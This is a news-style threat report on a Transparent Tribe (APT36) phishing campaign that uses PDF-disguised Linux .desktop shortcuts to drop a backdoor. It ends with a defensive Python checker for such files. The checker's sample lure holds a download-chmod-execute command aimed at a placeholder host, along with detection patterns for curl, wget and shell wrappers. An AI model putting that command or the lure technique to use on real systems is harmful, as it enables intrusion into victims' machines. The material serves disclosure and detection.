Transparent Tribe Launches Phishing Campaign Targeting Indian Government Using Weaponized Desktop Shortcuts

The advanced persistent threat (APT) actor known as Transparent Tribe has been observed targeting both Windows and BOSS (Bharat Operating System Solutions) Linux systems with malicious Desktop shortcut files in attacks aimed at Indian Government entities. Initial access is achieved through spear-phishing emails, as reported by CYFIRMA. Linux BOSS environments are specifically targeted via weaponised .desktop shortcut files that, once opened, download and execute malicious payloads. Transparent Tribe, also referred to as APT36, is assessed to be of Pakistani origin. The group, along with its sub-cluster SideCopy, has a storied history of infiltrating Indian government institutions using various remote access trojans (RATs). This latest dual-platform approach demonstrates the adversarial collective’s continued sophistication, allowing it to broaden its targeting footprint and maintain access to compromised environments.

The attack chains commence with phishing emails that contain supposed meeting notices, which are, in reality, booby-trapped Linux desktop shortcut files named “Meeting_Ltr_ID1543ops.pdf.desktop.” These files masquerade as PDF documents to deceive recipients into opening them, leading to the execution of a shell script. The shell script acts as a dropper, fetching a hex-encoded file from an attacker-controlled server and saving it to disk as an ELF binary. Simultaneously, it opens a decoy PDF hosted on Google Drive by launching Mozilla Firefox.

The Go-based binary establishes contact with a hard-coded command-and-control (C2) server, modgovindia[.]space:4000, to receive commands, fetch payloads, and exfiltrate data. The malware also ensures persistence through a cron job that executes the main payload automatically after a system reboot or process termination. Cybersecurity company CloudSEK, which independently reported the activity, noted that the malware performs system reconnaissance and is equipped to conduct a series of dummy anti-debugging and anti-sandbox checks to evade emulators and static analyzers.

Furthermore, Hunt.io’s analysis revealed that the attacks aim to deploy a known Transparent Tribe backdoor called Poseidon, which facilitates data collection, long-term access, credential harvesting, and potentially lateral movement. APT36’s ability to customise its delivery mechanisms according to the victim’s operating environment significantly increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.

This disclosure follows recent observations of Transparent Tribe actors targeting Indian defence organisations and related government entities using spoofed domains, with the ultimate goal of stealing credentials and two-factor authentication (2FA) codes, believed to be facilitated through spear-phishing emails.
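As an added, defender-side example that is not code from the article or from any of the vendors it cites, the following Python checks a .desktop file for the traits this lure relies on: a document extension hidden in front of the .desktop suffix, an Exec line that fetches and runs a remote file, and a document icon placed on a shell launcher. The file bodies, the example.invalid URL and the indicator wording are constructed for this example; only the lure filename comes from the report.

```python
import configparser
import re
from pathlib import PurePath

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
FETCH_RE = re.compile(r"\b(curl|wget)\b")
SHELL_RE = re.compile(r"\b(ba|z|da)?sh\s+-c\b")
DROP_RE = re.compile(r"chmod\s+\+x|/tmp/|/dev/shm/")

def assess_desktop_file(filename: str, text: str) -> list:
    """Return the indicators found in one .desktop file (empty list = nothing flagged)."""
    findings = []
    # "x.pdf.desktop" is shown as "x.pdf" by file managers that hide the .desktop suffix.
    if PurePath(filename).stem.lower().endswith(DOC_EXTS):
        findings.append("double extension: filename poses as a document")
    cp = configparser.ConfigParser(interpolation=None)  # .desktop files are INI-like
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return findings
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    icon = entry.get("Icon", "").lower()
    if FETCH_RE.search(exec_line):
        findings.append("Exec fetches remote content")
    if SHELL_RE.search(exec_line):
        findings.append("Exec wraps an inline shell command")
    if DROP_RE.search(exec_line):
        findings.append("Exec stages and runs a file from a scratch directory")
    if ("pdf" in icon or "document" in icon) and SHELL_RE.search(exec_line):
        findings.append("document icon on a shell launcher")
    return findings

# Constructed samples (not files from the campaign): a lure-style entry with a placeholder URL, and an ordinary launcher.
LURE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
LURE_TEXT = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://example.invalid/p -o /tmp/p; chmod +x /tmp/p; /tmp/p"
"""
BENIGN_NAME = "editor.desktop"
BENIGN_TEXT = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""
```

Running `assess_desktop_file` over every `.desktop` file in user autostart and Desktop directories, and alerting on any non-empty result, gives a cheap host-side check for this class of lure.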

Categories: Cybersecurity Threats, Targeted Attacks, Malware Techniques

Tags: Advanced Persistent Threat, Transparent Tribe, APT36, Spear-Phishing, Windows, BOSS Linux, Malicious Payloads, Desktop Shortcut Files, Command-and-Control, Credential Harvesting
